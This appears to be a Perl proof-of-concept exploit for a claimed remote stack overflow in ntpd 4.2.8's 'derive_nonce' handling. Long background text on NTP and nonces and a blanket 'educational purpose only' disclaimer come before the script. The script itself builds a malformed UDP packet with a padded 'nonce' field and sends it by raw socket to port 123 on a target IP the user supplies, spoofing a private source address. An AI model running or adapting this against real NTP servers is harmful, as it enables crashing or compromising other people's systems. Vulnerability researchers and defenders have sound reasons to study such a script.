#!/usr/bin/perl # # Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC # # Copyright 2016 (c) Todor Donev # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # http://pastebin.com/u/hackerscommunity # # # Description: # The ntpd program is an operating-system daemon that sets and maintains # a computer system's system time in synchronization with Internet-standard # time servers. It is a complete implementation of the Network Time Protocol # (NTP) version 4, but retains compatibility with versions 1, 2, and 3. # ntpd uses a single configuration-file to run the daemon in server and/or # client modes. The configuration file, usually named ntp.conf, is located # in the /etc directory. Other important files include the drift file, which # ntpd uses to correct for hardware-clock skew in the absence of a connection # to a more accurate upstream time-server. # # Nonce is an arbitrary number that may only be used once. It is similar in # spirit to a nonce word, hence the name. It is often a random or pseudo-random # number issued in an authentication protocol to ensure that old communications # cannot be reused in replay attacks. They can also be useful as initialization # vectors and in cryptographic hash function. A nonce is an arbitrary number used # only once in a cryptographic communication, in the spirit of a nonce word. # They are often random or pseudo-random numbers. Many nonces also include a # timestamp to ensure exact timeliness, though this requires clock synchronization # between organizations. The addition of a client nonce ("cnonce") helps to improve # the security in some ways as implemented in digest access authentication. To ensure # that a nonce is used only once, it should be time-variant (including a suitably # fine-grained timestamp in its value), or generated with enough random bits to ensure # a probabilistically insignificant chance of repeating a previously generated value. # Some authors define pseudo-randomness (or unpredictability) as a requirement for a # nonce. # # Disclaimer: # This or previous program is for Educational purpose ONLY. Do not # use it without permission. The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational purpose ONLY! # # Thanks to Maya Hristova and all my friends that support me. # # Suggestions,comments and job offers are welcome! # # use Net::RawIP; print "[ Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC\n"; print "[ ======\n"; print "[ Usg: $0 \n"; print "[ Example: perl $0 133.71.33.7\n"; print "[ ======\n"; print "[ Todor Donev\n"; print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n"; print "[ Website: https://www.ethical-hacker.org/\n"; my $target = $ARGV[0]; my $data = "\x26\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x6e\x6f\x6e\x63\x65\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; my $sock = new Net::RawIP({ udp => {} }) or die; $sock->set({ ip => { saddr => "192.168.1.1", daddr => $target}, udp => { source, => 31337, dest => 123 , data => $data}}); $sock->send;